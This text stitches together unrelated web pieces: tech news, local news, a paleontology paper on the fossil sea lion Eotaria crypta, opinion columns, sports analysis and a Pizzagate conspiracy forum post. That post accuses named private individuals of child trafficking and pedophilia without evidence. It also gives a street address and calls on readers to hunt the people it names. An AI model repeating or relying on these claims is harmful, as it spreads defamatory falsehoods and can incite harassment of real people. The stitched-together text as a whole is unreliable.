The Verizon Note 3 is the latest Android device to be invited to the Lollipop party. The Note 3's product support page on Verizon's site has been refreshed with the announcement of the software update and a brief overview of the enhancements of Android 5.0.
The new software will showcase a material(ish) version of TouchWiz, as well as performance enhancements and optimized battery performance. Unfortunately, the update will not remove the horrendously placed Verizon logo on the home button (I find it amusing that all the Note 3 images on the software update page are logo free). Edit: As the commenters pointed out, that was the Note 2 with the Verizon logo on the home button.
Software build version LRX21V.N900VVRUEOB6 will start rolling out soon as an OTA. Let us know in the comments when you see it on your device.
Exhibition: Guernica remakings A guest exhibition exploring the ongoing power of Pablo Picasso's iconic 1937 painting Guernica through a display of 21st century reworkings from across the globe. The exhibition marks the 80th anniversary of the extraordinary story of the showing of Picasso's Guernica in a car showroom in Manchester. More about Guernica Remakings at http://guernicaremakings.com. All......
International Women's Day event 'Remembering resistance: a century of women's protest in the North of England' An afternoon focussed on a project bringing to life the last 100 years of women's protest, discussing the changing nature of women's activism and some of the more significant protest sites in the North. Come along and recall your experiences of protest - and please do dig out any......
Townsend Productions - Rouse, ye women Through traditional songs and ballads, Townsend Productions reveal the story of the women chainmakers of Cradley Heath in the West Midlands. In 1910 they began a successful ten-week strike, led by charismatic union campaigner Mary Macarthur, to more than double their earnings and establish the principle of a national......
Nicola Ashmore and Claire Hignett talks, Guernica Remakings In this two-part event Nicola Ashmore, the curator of the Library's current exhibition, will give an illustrated talk that explores Picasso's Guernica and its remakings as a call to action, pushing back at those in power who choose to act to the detriment of civilians. During the exhibiting of Guernica......
Tom Woodin talk 'Working class writing and publishing in the late 20th century: literature, culture and community' Tom will discuss the emergence of working class writing and publishing workshops in the 1970s and their impact. Many working class people, including school #children, housewives, workers and others, all took up writing in order to express their feelings, understand their lives and promote change. New relationships between writers, audiences and publishers were......
DPS balks at complaints about Guadalupe River patrols
Image 1 of / 212 Caption Close DPS balks at complaints about Guadalupe River patrols 1 / 212 Back to Gallery
SAN ANTONIO — River outfitters upset with beefed-up state police presence on the Guadalupe River have asked county officials to reduce the amount police on the popular River Road in New Braunfels because it discourages customers.
However, the Texas Department of Public Safety said “public safety is the priority” and will continue to patrol areas on “a case-by-case basis”, said Sgt. Jason Reyes of the DPS' San Antonio office.
At least two River Road outfitters complained to the Comal County Commissioners Court on Thursday, calling the DPS presence on the two-lane road that follows the Guadalupe and is lined with campgrounds “overkill” on Memorial Day Weekend, which typically is the unofficial start of tubing season.
“We were inundated by state police,” said Paul Rich of Mountain Breeze Campground, according to the New Braunfels Herald-Zeitung. “Obviously, it was a bad thing. It scared a lot of people away. It was overkill on state police.”
Reyes declined to provide the number of troopers who patrolled the area during Memorial Day Weekend, but said the troopers were spread throughout Comal County, not just on the Guadalupe River.
“I would think that with our presence being out there it would encourage individuals to feel safe,” Reyes said.
Reyes said the agency also has heard compliments and that the DPS will continue to make public safety a priority.
“It makes sense for us to put out extra patrols” during high traffic weekends, said Reyes. “We brought in additional units from surrounding counties and made 19 DWI arrests, a couple of drug arrests and served two warrants.”
Each of the two river outfitters who complained to county commissioners, including Rich and Johnnie Bezdek of Bezdek's Rentals, did not immediately return calls for comment.
Comal County Sheriff Bob Holder and Comal County Judge Sherman Krause did not immediately return calls for comment.
kparker@express-news.net
Twitter: @KoltenParker
Christianity is under siege in America. Not by Starbucks, with their Jesus-less cups, or department stores that wish customers “Happy holidays” instead of “Merry Christmas,” but by Christians themselves.
That's the conclusion reached by Charles Mathewes, a professor of Religious Studies at the University of Virginia, in an article for the Washington Post. He specifically calls out white evangelical Christianity — the people who overwhelmingly support Donald Trump and the Republican Party as a whole.
When we've reached a place where good Christian folk think it's a matter of major theological principle not to sell pastries to gay people but are willing to give pedophiles a pass, I think it's safe to say that American Christianity today — white American Christianity in particular — is in a pretty sorry state.
He adds that white evangelicals hold beliefs that contradict their own message of forgiveness, compassion, and redemption. They love guns, hate immigrants, support the death penalty, ignore the poor, and turn a blind eye to race and gender issues.
For believers in a religion whose Scriptures teach compassion, we're a breathtakingly cruel bunch.
Mathewes goes on to argue that Christians today are guided more by fear than by bigotry. They don't want to lose the culture war and become irrelevant. But that, again, goes against their own beliefs. If God is really in control, and has a grand plan for each and every one of us, then what is there to worry about? Who cares if people stop saying “Merry Christmas” — shouldn't God be bigger than that?
Doesn't seem like it. The God worshiped by Christians who support Trump seems obsessed with accumulating power while keeping down everyone who doesn't already have it.
In the meantime, I've never heard of anyone accepting Jesus because someone said “Merry Christmas” to them. I have, however, heard plenty of people reconsider their beliefs about Christians (if not Christianity itself) when they encounter worshipers actively trying to make the world a better place.
Mathewes has a point: “Christian persecution” is real. But that persecution isn't coming from atheists or other believers. The people hurting Christianity the most are the followers of Jesus who worship the Republican Party platform far more than anything in the New Testament.
The poorly known fossil record of fur seals and sea lions (Otariidae) does not reflect their current diversity and widespread abundance. This limited fossil record contrasts with the more complete fossil records of other pinnipeds such as walruses (Odobenidae). The oldest known otariids appear 5–6 Ma after the earliest odobenids, and the remarkably derived craniodental morphology of otariids offers few clues to their early evolutionary history and phylogenetic affinities among pinnipeds. We report a new otariid, Eotaria crypta , from the lower middle Miocene ‘Topanga' Formation (15–17.1 Ma) of southern California, represented by a partial mandible with well-preserved dentition. Eotaria crypta is geochronologically intermediate between ‘enaliarctine' stem pinnipedimorphs (16.6–27 Ma) and previously described otariid fossils (7.3–12.5 Ma), as well as morphologically intermediate by retaining an M 2 and a reduced M 1 metaconid cusp and lacking P 2–4 metaconid cusps. Eotaria crypta eliminates the otariid ghost lineage and confirms that otariids evolved from an ‘enaliarctine'-like ancestor.
1. Introduction
Modern fur seals and sea lions (Otariidae) are a clade of pinnipeds characterized by shelf-like supraorbital processes on the skull, loss of M 2 and a simplified dentition [1,2]. Although most extant otariids (11 of 16 species) are restricted to the Southern Hemisphere, prior fossil evidence indicates a North Pacific centre of origin for the clade [2–4]. Other crown pinnipeds, including their sister group Odobenidae (walruses), are well-represented within middle Miocene assemblages worldwide [3,5]. By contrast, otariids first appear in the early late Miocene [4,6] and a 5–6 Ma gap exists between the oldest described otariids and the oldest odobenids [4,6,7], indicating a significant ghost lineage for Otariidae. A century of extensive sampling and study of middle Miocene marine vertebrate assemblages from the Pacific coast of North America has otherwise failed to unearth other fossils of true otariids, including the robustly sampled Sharktooth Hill Bonebed. Kohno [8] remarked upon the rarity of middle Miocene otariids and hypothesized that the earliest otariids may have been primarily pelagic in distribution, only rarely straying into shallow marine coastal regions where preservation potential is higher.
Otariids are diagnosed by few cranial and postcranial synapomorphies and many simplified (or lost) dental features, in concert with primitively retained postcranial features [9]. The morphological conservatism of fossil and extant otariids hinders interpretation of their early evolution. We report a new genus and species of stem otariid, Eotaria crypta, based on a partial mandible with well-preserved dentition (figure 1) from the lower middle Miocene ‘Topanga' Formation of southern California. Eotaria is morphologically intermediate between previously described fossil otariids and stem pinnipedimorphs, thereby filling a morphological gap in our understanding of pinniped evolution and elucidating the early dental evolution of Otariidae. Eotaria is also geochronologically intermediate and eliminates the otariid ghost lineage. Figure 1. Holotype specimen of E. crypta, OCPC 5710 in (a) medial view, (b) lateral view and (c) dorsal view. (Online version in colour.)
2. Material and methods
The new fossil resides in collections of the John D. Cooper Archaeological and Paleontological Center (Orange County Paleontological Collection, OCPC). The holotype specimen (OCPC 5710) was collected from the ‘Topanga' Formation in Mission Viejo, Orange County, California, which has produced marine birds, other pinnipeds (Allodesmus sp., Pelagiarctos sp.), and dolphins (Kentriodon sp., cf. Zarhinocetus errabundus) [10,11]. Age determinations for the ‘Topanga' Formation include a 15.8 ± 1.3 Ma K : Ar date from andesite near the base of the Paulerino Member of the ‘Topanga' Formation to the west in the San Joaquin Hills [12] and land mammals from Oso Reservoir [13] indicating a Late Hemingfordian (15.9–17.5 Ma) to Barstovian (12.5–15.9 Ma) Land Mammal Age [14]. The finest local age control is provided by foraminifera of the Relizian and Lower Luisian zones [15], which indicate an age of 14.9–17.1 Ma [16] for the ‘Topanga' Formation in Orange County.
To determine phylogenetic placement of E. crypta, we performed a phylogenetic analysis of 115 morphological characters (modified from earlier studies [2,9,10,17] and including three novel characters) coded for 23 taxa representing all families and all contemporary pinnipeds (electronic supplementary material). Character sampling was focused on those characters most useful for resolving the phylogenetic relationships of stem otariids and early pinnipeds, and coding focused on male specimens to minimize effects of sexual dimorphism. A polymorphic character coding method was used to accommodate intra-taxon character variation [18]. We also employed polymorphic coding [18] to accommodate widespread individual variation in pinnipeds [2]. Phylogenetic analyses were carried out in TnT [19], using 10 000 replicates with sectorial and tree-fusing options and with equal and implied weighting (K = 2–6); analyses using both a constrained and unconstrained topology were executed (electronic supplementary material, appendix).
3. Systematic palaeontology
Eotaria crypta gen. et sp. nov.
Etymology. The generic name is from the Greek Otaria, the name of the type genus of the family Otariidae and referring to the diminutive external ear of sea lions, plus the Greek eos, meaning dawn and referring to the early age of this new genus. The species name is from the Greek kryptos, meaning hidden, and referring to the rarity of middle Miocene otariids.
Holotype. OCPC 5710, a partial right mandible including P 2–4 , M 1 and M 2 alveoli.
Type locality and horizon. Lower middle Miocene (Burdigalian–Langhian) ‘Topanga' Formation, Mission Viejo, Orange County, California.
Diagnosis. A diminutive otariid that differs from all other members of the family in combined possession of these features: M 1 anteroposteriorly longer than premolars, reduced metaconid cusp present and a reduced M 2 present.
4. Morphology and phylogeny
The ramus is transversely narrow and tabular in shape with a shallow masseteric fossa, a minute crest-like genial tuberosity positioned below P 2 , and several small mental foramina; a distinct ventral crest for digastric insertion is absent. P 2 –M 1 are double-rooted, while the M 2 bears a single small, circular alveolus. P 2 –P 4 crowns are high-crowned, morphologically similar to one another, lanceolate, and dominated by the protoconid. The paraconid and hypoconid are developed as minute anterior and posterior accessory cusps (respectively). The hypoconid is almost absent in P 2 . The M 1 is anteroposteriorly longer than P 2 , but the protoconid is not as high; it bears a similar paraconid, and a more strongly developed and posterodorsally oriented hypoconid. A vestigial metaconid cusp is present on the basal heel of the posterior crista of the M 1 protoconid; this cusp is absent on premolars. All teeth bear a smooth crest-like lingual cingulum. The mandible of E. crypta is relatively small and comparable in size to mandibles of adult Arctocephalus philippii and the extinct otariid Pithanotaria starri. Eotaria crypta differs from all other otariids (extinct and extant) in primitively retaining an M 2 and reduced metaconid cusp on M 1 .
Constrained and non-constrained phylogenetic analyses produced identical trees, with E. crypta recovered as the sister taxon to a clade comprising all other otariids (figure 2). One most parsimonious tree was recovered (retention index = 0.56, consistency index = 0.45, tree length = 47.69). A K-value of 3 for implied weighting was generally found to be the most optimal weighting scheme; variation in K generally did not affect the placement of E. crypta, but did influence odobenid monophyly. Weaker weighting schemes recovered Odobenidae as paraphyletic, with Odobenus embedded within crown Otariidae, and the remaining walruses reduced to an assemblage of stem taxa outside a clade comprising Phocidae, Desmatophocidae and Otariidae. Figure 2. Geochronologically calibrated cladogram depicting phylogenetic relationships of E. crypta. Support values include bootstrap support values derived from non-constraint analysis (left) and constraint analysis (right). Squares at nodes denote position of enforced clades defined in constraint analysis. For geochronologic ages of pinnipeds, see the electronic supplementary material. †Denotes extinct group.
A clade comprising E. crypta and all other otariids was supported by two unambiguous synapomorphies: postcanine crowns that are transversely narrow, equi-dimensional and anteroposteriorly shorter than high (character 74); and postcanine teeth with reduced metaconid cusp and concave posterior margin of the protoconid (character 94). All later diverging otariids were united by the absence of M 2 (character 98).
5. Discussion
Dentition of E. crypta is morphologically intermediate between ‘enaliarctine' stem pinnipedimorphs (e.g. Enaliarctos and Pteronarctos) and extant otariids. Eotaria crypta lacks a trenchant paraconid cusp as in ‘enaliarctines', but primitively retains a metaconid cusp (albeit reduced and positioned basally), limited heterodonty of the postcanines, and an M 2 . As all later otariids (fossil and modern) are more dentally derived, E. crypta provides dental evidence for the derivation of otariids from an ‘enaliarctine'-like ancestor. Significantly, E. crypta is also geochronologically intermediate between late surviving ‘enaliarctines' (e.g. Pteronarctos goedertae, Astoria Formation, OR, USA; 16.6–20.2 Ma) and the earliest published fossil otariids (Otariidae indet., Aoki Formation, Japan, 11.8–12.5 Ma [6]; Pithanotaria starri, Monterey Formation and Santa Margarita Sandstone, CA, USA, 7.3–10 Ma; see the electronic supplementary material). Discovery of E. crypta eliminates a 5–6 Ma ghost lineage for the Otariidae, formerly defined by the gap between Proneotherium repenningi (16.6–17.3 Ma [20]) and the Aoki Formation otariid (11.8–12.5 Ma [6]). Formerly, Barnes [7] hypothesized that the ‘enaliarctine' Pteronarctos goedertae represented an early diverging otariid that filled the temporal gap (10–19.1 Ma) between Enaliarctos and Pithanotaria; however, cladistic analysis ([9,10,21]; this study) conclusively demonstrates that Pteronarctos lies outside crown Pinnipedia.
Although E. crypta convincingly demonstrates that otariids evolved within the North Pacific, it represents the entire published fossil record of middle Miocene otariids. Eotaria crypta was collected from the ‘Topanga' Formation along the Pacific coast, while the more intensely sampled Sharktooth Hill Bonebed was deposited within a large restricted embayment in the San Joaquin Basin [22], provisionally supporting Kohno's [8] hypothesis that the earliest stem otariids were pelagic in distribution. Perhaps, adaptation to pelagic (rather than coastal) environments facilitated the early divergence (and later success) of otariids.
Acknowledgement Thanks to three anonymous reviewers and the editor for constructive comments. We wish to thank J. F. Parham and M. Rivin for access to OCPC collections. We also thank the Rivin family for their hospitality and M. Couffer for collecting and donating the E. crypta holotype. This study also benefited greatly from comments by J. F. Parham, Y. Tanaka and C.-H. Tsai.
Author contributions
R.W.B. and M.C. designed the research, collected data and wrote the paper; M.C. conducted the phylogenetic analysis.
Funding statement
R.W.B. was supported by a University of Otago Doctoral Scholarship .
Conflict of interests
Authors have declared that no competing interests exist.
Footnotes
Govt should take action against @myntra for selling cow leather shoe and hurting religious sentiments of Hindus. pic.twitter.com/24z6lg5XHk &'mdash; RSS (@RSS_Org) November 11, 2015
@RSS_Org the product in question is an imported product and/or made from imported leather. the sale of leather products is not illegal (2/3) &'mdash; Myntra (@myntra) November 11,
BENGALURU: The Hindutva brigade's online campaign to protect the cow has taken a new turn with e-commerce major Myntra , owned by Flipkart, becoming the latest target.A tweet posted on Wednesday from Twitter account @RSS_Org demanded that the government should act against Myntra as it sold shoes made from cow leather. It even asked Myntra to take such products off its catalogue. “Govt should take action against @myntra for selling cow leather shoe and hurting religious sentiments of Hindus,” said @RSS_Org.Though @RSS_Org is not the official handle of the Sangh, it counts among its followers Prime Minister Narendra Modi, finance minister Arun Jaitley, Maharashtra chief minister Devendra Fadnavis, Rajasthan CM Vasundhara Raje, Gujarat CM Anandiben Patel, Madhya Pradesh CM Shivraj Singh Chouhan and Chhattisgarh CM Raman Singh, among others.When contacted by TOI, Rajesh Padmar, who is in charge of RSS media affairs in Karnataka, said: “@RSS_Org is the Twitter handle of one of our swayamsevaks. The RSS recognises this handle and public opinion expressed there is shared at the @RSSorg Twitter handle, which is the official and verified one (of Sangh). We endorse the tweet by @RSS_Org on Myntra.”Given the sensitivity surrounding the cow, Myntra responded on the social media platform by saying it is acting well within the laws of the land. Material for the products it sells was imported into India, it said, implying that cows were not killed in the country for the leather.“We appreciate your sentiments. We feel sorry if the sale of any particular item does not meet your approval. However, in India, please be assured that we function well within legally permissible norms,” @myntra, the e-tailer major's official Twitter handle posted.The e-tailer's quick response to @RSS_Org was perhaps prompted by the fact that the latter has over 69,800 followers, including several political heavyweights.
Scaling Bitcoin remains a very contested topic of discussion right now. Over the past two months, some people started pledging support for the UASF. Given the recent success of other assets implementing SegWit, it is evident something needs to happen. A chain split is still a possibility for Bitcoin, although it is best to avoid that altogether. Unfortunately, UASF support still only sits at 6%.
Scaling Debacle Continues
The big question on most people's minds is whether or not Bitcoin will fork. Although many people dismiss the possibility, a chain split can still occur. It is evident a scaling solution will need to activate on the network. So far, SegWit has seen far less success than most people would like. Bitcoin Unlimited, on the other hand, has a similar level of support. Only one of these solutions can activate, though, yet it seems unlikely either will do so.
Quite a few other digital assets have activated SegWit on the network so far. Litecoin is the first major one to do so. Ever since that time, the value of LTC has increased by quite a margin. It is unlikely activating SegWit will multiple the Bitcoin price, although it is not entirely unlikely. As we have seen late last week, network congestion is still a big problem. Solving that problem, as well as introducing a malleability fix, can send the Bitcoin value upward.
One possible solution to end this debate once and for all is the UASF. This soft-fork would activate SegWit on the network. It requires majority network support to do so, though. After nearly two months, the USF only has 6% support, which is insufficient. A lot of work needs to be done if this scaling solution wants to activate on the network. Running nodes signaling support is one thing, but it has little practical value right now.
UASF Support Remains Incredibly Low
According to Luke Dashjr, there are two options on the table. Either the UASF activates through community support, or Bitcoin needs a PoW change. This latter option has been discussed a few times in the past. It seems highly unlikely that change will come to pass, though. Gaining support for the user-activated soft fork seems highly unlikely as well at this stage. One could argue a lot of people are seemingly content to maintain this status quo indefinitely.
These are some troubling times for Bitcoin, to say the least. Although this scaling debate has not affected the price in a negative manner, a split certainly would. Avoiding such a damaging event needs to be the top priority right now. Whether or not the UASF is the right solution to do so, remains to be seen, though.
Ubuntu is sometimes thought of as the beginner's distro, something that more advanced users don't care about - they think if you're advanced, you need Slackware or something where you have to build it from scratch, rewrite or add parts to the kernel to make it more compatible to your system, write your own drivers, etc, but that just takes up time. Of all the distros I've tried, Ubuntu is the fastest, most reliable, and (most of the time) most compatible.
I'm serious. Ubuntu is the fastest I've tried. Fedora and openSUSE are the other distros I've actually spent quality time with, and Ubuntu is a huge leap ahead Fedora. openSUSE just took a long time to boot up and still has a splash screen, which is dying out
Now, I'm serious : Ubuntu is the distro that crashes the least with me.
Of course, the last reason isn't the best. Sometimes I can only find binaries in RPM format online, which I prefer over manual compiling because sometimes it can be such a pain to compile. But, let's face it: Ubuntu has a HUGE list of available packages for download and you can find most anything there. Fedora's pyrut visual package manager is slooow and takes a long time to browse. openSUSE's visual package manager is also slow, and doesn't provide for faster package name searching like Ubuntu, but it's more acceptable than pyrut.
Now, compatibility doesn't always have to be with software - Ubuntu has currently been the only distro to recognize my Nvidia graphics card and allow me to run desktop effects. openSUSE could barely recognize it, and trying to install the drivers broke my installation. Fedora, let's not even go there. It told me I didn't have an advanced enough graphics card to play SuperTux!
Let's face it - Ubuntu has been a work of art in open source. I have yet to see a distro with such a punctual release schedule, team organization, and user resources.
Will the three former Conservative senators at the centre of an expense scandal attend Wednesday's throne speech?
It might be uncomfortable for the governing Conservatives to see their former colleagues — the subject of audits and RCMP inquiries over their expense claims — in the red chamber as the government tries to "reset" the parliamentary agenda.
But all sitting senators, including Patrick Brazeau, Pamela Wallin and Mike Duffy, received an invitation from the Senate Speaker to listen to Gov. Gen. David Johnston outline the government's to-do list on Wednesday.
Even Brazeau, who was placed on a forced leave of absence in the last parliamentary session, is allowed to attend. Last February, the Senate passed a motion suspending Brazeau from the Senate with pay after he was charged with assault and sexual assault. But because Parliament was prorogued, at Prime Minister Stephen Harper's request, that suspension is no longer valid.
The Senate will reintroduce the same motion to again suspend Brazeau next week.
Wallin and Duffy were removed from the Conservative caucus following reports on their expense claims by a third-party auditor. Brazeau had been dropped from the party's caucus earlier this year due to an unrelated legal matter. All three now sit as independents.
Brazeau is not expected to take his seat for the throne speech Wednesday due to health issues. He was taken to hospital earlier this month.
Whether Wallin or Duffy will appear on the day the government wants to kick off its new agenda is unknown.
Sasha/Anita Lord is the music performance booker at Comet Pizza, she is close friends with the musicians of satanic Heavy Breathing and linked in the "friends" tab of Comet's website. Due to hacked emails, we are able to see a correspondence between her and a Dave Stone asking for a reference for "Richard Windsor." http://i.imgur.com/Hf1f97w.png
Upon further research "Richard Windsor is the known alias of ex CLINTON FOUNDATION board member Lisa P. *Jackson http://i.imgur.com/Bo03W0l.png .
“Dave Stone” / “David Flintstone” who calls himself a "poobah" is the owner of the very odd website www.daveflintstone.com where the only image is Mr. Potatohead.
The site is registered to a Dave Stone, the same owner of a site known as islanddistilers.com The site also lists him as proprietor http://i.imgur.com/Zpjx0sM.png EDIT: fixed link.
In the emails, a bizarre message regarding "sleeping partners" includes the .jpeg of mr. potato head once again as a supposed sleep partner option. http://i.imgur.com/LjutH1R.png
Through his emails he is linked to a "Biff Skippman,” a self professed “grand poobah.”
His Facebook is equally odd as it contains a bizarre bio with the image of Mr. Potatohead. HE STATES HE IS IN HAWAII. It also states that he is the owner of the "Cheesybay" company. He makes multiple references to supplying cheese in terms of code. http://i.imgur.com/JkTSI2Z.png http://i.imgur.com/CUu9jNr.png
Upon research, cheesy bay was an eBay account selling used *faulty drives for high prices with raging customer reviews. http://www.ebay.com/usr/cheesybay
Here's what it all starts to come together… http://i.imgur.com/JIl4Hd7.png
if that wasn't crazy enough, i cross-referenced this all against voat and reddit and came across something HUGE. (I am completely covered in goose bumps and actually feel afraid at this point) I found this reddit thread: https://www.reddit.com/r/BlackOps/comments/4fs7a8/question_why_would_there_be_30ish_wifi_networks/ Please give this a read then share in my terror. 577 Pakala St, Honolulu 96825 when searched shows a result for DAVE STONE AND ISLAND DISTILLERS…
THE REDDIT USER SPECIFICALLY MENTIONS HER CONCERNS ABOUT HUMAN TRAFFICKING AND HER BOSS'S ACTIVITY AS CHEESYBAY.
FURTHER IN THE PICS, THE REDDIT USER POSTED THIS: http://i.imgur.com/EgLDtB2.png THAT MOUNTAIN RIDGE AND GROUP OF HOMES IS IDENTICAL TO THAT IN THE PICTURE ABOVE I POSTED OF ISLAND DISTILLERS AND DAVE FLINTSTONE. IS THIS THE HAWAII HOT DOG STAND PODESTA WAS TALKING ABOUT??
577 Pakala Street Honolulu, HI Find on map >> Show street view
Owner: B P BISHOP TRUST ESTATE
What is this trust and why does it own this property??
It turns out it also owns 587 paluka as well a huge amount of other land. according to my research, “The Bishop Estate is the largest private property owner in the state of Hawaii, governed by five trustees who are each paid more than $800,000. annually. With assets of around $10 billion, it is one of the richest private charities in the world, whose sole beneficiary is the Kamehameha Schools, located in the heights above Honolulu with a student body of only about 3,200.”
Heres the weird part; “ The governor of the state of Hawaii appoints the Supreme Court justices and also provides the names of candidates to be considered for the lucrative Bishop Estate Trustee position. Because of this cozy relationship between the government and the estate, the coveted trustee position, over time, became a plum for Hawaii's Democrat machine insiders. For over fifty years the Democrats have ruled Hawaii. " It is the longest running continuous political machine in U.S. history." Says political commentator David Broder Being accountable to no one and in control of so much wealth and power, for so long, the trustees festered with greed and arrogance. Honolulu Weekly, Hawaii's alternative news weekly, raised a red flag in editorials and cartoons as early as 1991 but the mainstream media, always in support of the local government and the status quo, were relatively quiet until 1997 when corruption at the estate became so transparent as to be undeniable. On August 9, 1997, a small group of prominent Hawaii activists, published a newspaper article titled, "Broken Trust" which called for the removal of all but one of the trustees and urged the state to investigate. An investigation was conducted by the state attorney general and also by the IRS. On May 7, 1999, Probate Judge, Kevin Chang ordered the trustees temporarily removed after the IRS threatened to revoke the estate's tax-exempt status. By December 13, 1999, all five of the Bishop Estate Trustees had either resigned or were permanently removed by court order.”
And according to a NY TIMES article, “A Hawaiian educational trust is investing $250 million into the Goldman Sachs Group, the parent company of Goldman, Sachs & Company, the companies announced yesterday. The trust will get a stake in Goldman of more than 5 percent,' Goldman officials said.”
THEY OWN 5% OF GOLDMAN SACHS AND ARE DEMOCRAT POLITICAL POWER MACHINE. http://i.imgur.com/xJ37FbE.png
Now get this: I cross-reference “Dave Stone” through wiki leaks with respect to Clinton and Podesta and find a possible smoking gun. There are several mentions made to a “Dave Stone,” one is clearly deceased as references to his funeral are mentioned (active duty). BUT there are mentions in HRC's calendar for a PRIVATE MEETING w/ DAVE STONE. https://wikileaks.org/clinton-emails/emailid/15365
This is obviously a separate person than the Dave Stone who was deceased due to the dates. This obviously requires more investigation but in a seperate message Dave Stone is is connected to an LLC. that has some programs regarding HUMAN TRAFFICKING. This is a correspondence directly to HRC. ( https://wikileaks.org/clinton-emails/emailid/240 ) Dace Stone's name is attached to Stone Harbour, LLC who is mentioned in the email for their work with human trafficking. But a closer inspection of this LLC only shows three properties. One of which seems to be featured in Comet's link to Panda Head Mag's bizarre video from issue 7 titled, “CVLT.” No work regarding human trafficking is mentioned unless of course, their work is not against trafficking…
David Stone/ Dave Flintstone seems to tie all these parties together, a “Hawaii Connection” of sorts; he is in contact with Comet, HRC, and seemingly Podesta's Hot Dog Stand. More research is required on all these but holy shit guys this is huge. We al need to do more research into Stone Harbour, BP BISHOP TRUST, suspected recruiter “Sasha” Lord, and this Hawaii Location. Is this where they are keeping the children? more research into it is required, maybe we can talk to the Reddit user? She's a direct source. the Images she posted raise so many concerns and tie a lot more together.(http://i.imgur.com/mb76Dse.png)) Notice the box is the bottom right?
Well: ](http://i.imgur.com/TKW5GN7.png )
We are beginning to see past all the deception and completely uncover their ring of pedophilia, lies, murder and evil.
I know I am dropping a lot out there but this needs to be spread and researched and completely pulled apart to see where this takes us.
We need to be coordinating with whoever will listen. Fact check everything and then share wherever you can. Remember, they will use the slightest mistake to discredit all of us. Help me make sure that doesn't happen. We can be the ones to put these people away and to bring these kids home.
The noose tightens yet again.
We are legion. They can't hide anymore. We will find them.
Happy Hunting.
Merrick here...
A few days ago, we learned that the Michael Bay produced TEENAGE MUTANT NINJA TURTLES reboot will make some changes to the nature of the title characters. Namely, the MUTANT Ninja Turtles are now, apparently, ALIEN in nature - as opposed to being regular Turtles that have been mutated by a goo. Details HERE.
This, of course, sparked considerable outcry from fans of not only the franchise, but those generally decrying TV and film projects which unnecessarily change established genre canon.
Bay has now responded to folks challenging the decision to make the TURTLTES alien, via his Shoot for the Edit forums...
Fans need to take a breath, and chill. They have not read the script. Our team is working closely with one of the original creators of Ninja Turtles to help expand and give a more complex backstory. Relax, we are including everything that made you become fans in the first place. We are just building a richer world.
Michael
So there you have it. We should all just 'chill.' Like that's gonna happen. Of course, Bay seems to have the Midas Touch in such matters. Despite loud protests regarding his adaptation and interpretation of TRANSFORMERS, those movies made a shitload of money, and more are on the way. Will this trend continue with TURTLES? We'll see...
--- follow Merrick on Twitter ! ---
Spicer said Tuesday that the president considered transgender rights to be “a states' rights issue and not one for the federal government.”
“I find it obscene that Mr. Spicer would characterize the well-being, the health and the very safety of transgender young people as an issue of states' rights,” responded Eliza Byard, executive director of the Gay, Lesbian and Straight Education Network. “The fact is that no child in America should have their rights subject to their zip code.”
Transgender students experience a significant degree of bullying in school.
The majority of respondents to the 2015 U.S. Transgender Survey who were out or perceived as being transgender while in school (K-12) reported being verbally harassed (54 percent), physically attacked (24 percent) or sexually assaulted (13 percent) because they were transgender.
“I worry that in the backlash and response, people are forgetting that these are children who fundamentally just need to go to school and have a right to be educated and not being able to use the bathroom that accords with their gender identity has profound consequences on their ability to actually receive an equal education. I feel like the human face of this has gotten lost in this,” Vanita Gupta, who at the time was the head of the Justice Department's Civil Rights Division, told The Huffington Post in December.
The Trump administration's latest decision could also affect the case of Gavin Grimm, a transgender teenager in Virginia who sued his school for the right to use the boys bathroom. The Supreme Court is set to hear oral arguments on March 28, and the rescinding of the federal guidance could give the court an excuse to throw it back to the lower court.
LGBTQ advocates emphasized Wednesday that even though the Trump administration rescinded the Obama administration's Title IX guidance, the legal foundation that interpretation was built upon is still solid.
“While it's disappointing to see the Trump administration revoke the guidance, the administration cannot change what Title IX means,” said Joshua Block, a senior staff attorney at the American Civil Liberties Union who is lead counsel for Grimm. “When it decided to hear Gavin Grimm's case, the Supreme Court said it would decide which interpretation of Title IX is correct, without taking any administration's guidance into consideration. We're confident that the law is on Gavin's side and he will prevail just as he did in the Fourth Circuit.”
Unfaithful partners will spend £2,000 on occasional secret holidays or weekends away and another £1,000 on wining and dining their bit on the side.
An average of £916 will go on booze and food in country pubs with around £1,000 being spent on flowers, chocolates and sexy underwear.
Even travelling to and from a romantic night away has its consequences - costing approximately £796.32 a year.
A spokesman for www.OnePoll.com which polled 2,000 love-cheats, said: "This survey shows that conducting an affair is a bad idea on a number of levels.
"Of course the partners suffer the most as a result of an affair, but folk are cheating themselves if they think getting into debt over a bit on the side is a good idea."
Nights out, including clubbing and the cinema, cost up to £943.32 a year.
It also emerged most mistresses receive at least 10 boxes of chocolates, 11 flower bouquets, 10 sets of clothes or sexy underwear and jewellery in a 12 month period - worth a whopping £1,057.44.
The poll revealed that even the cheated partners are showered with gifts whilst their other half plays away from home.
Eleven per cent of adults says they are more likely to take their partner for a weekend away if they are having an affair, while one in 10 usually buy flowers on the way home from a liaison.
Another one in 10 resort to buying chocolates regularly to ease their guilt, and seven per cent are more likely to treat the children to toys or money to make themselves feel better.
Rugby league is often dumbed down to its most fundamental – at times it can be a very simple game – but there is unquestionably a lot more going on underneath the most rudimentary of statistics.
Take Friday night's clash between the Broncos and the Storm and read the stats without watching the game.
The Broncos had more possession, more sets with the ball, more offloads, completed at 78 per cent and won the penalty count 8-4. Popular wisdom and everything we are told in the week-to-week beat of following rugby league leads us to believe that Brisbane should win the game or at the very least be ultra-competitive with that stat line.
This was last year's grand finalists playing at home at Suncorp Stadium with all these stats going in their favour and they were comprehensively ripped apart 48-6 by the Storm.
It was the Broncos' worst ever loss at Suncorp Stadium. The usual stats that are used as key indicators to a result do not add up.
There was no question watching the game that the Storm were in complete and utter control, completely out playing the Broncos.
But the stats by themselves would usually dictate a different picture. At half-time the Broncos had completed 94 per cent of their possessions and had more of the ball, yet they went into the sheds trailing 30-6!
Broncos coach Wayne Bennett was somewhat encouraged by his team's performance after the game, stating an injury to winger Corey Oates had changed the context of the contest.
"We were better than we were against the Bulldogs. I thought Melbourne were very good and they exploited our weakness when we got the injury to Corey [Oates] on the wing," Bennett said post match.
"We were better defensively this week than we were last week. Five of those tries we conceded came off kicks.
"I thought we were doing great early on and that the guys were doing their job. From then on they scored off four or five kicks."
The statistics suggest the Broncos didn't perform that badly and Bennett was quick to make the point.
"You don't complete at 94 per cent if you aren't doing something right," he said.
"I went into half-time knowing what the score was and that I couldn't change the scoreboard, but I knew we were trying hard and putting in with a lot of effort.
"The injury to Corey changed the whole course of the game."
It was a similar story the following day when the Wests Tigers beat the Penrith Panthers despite only having 42 per cent possession.
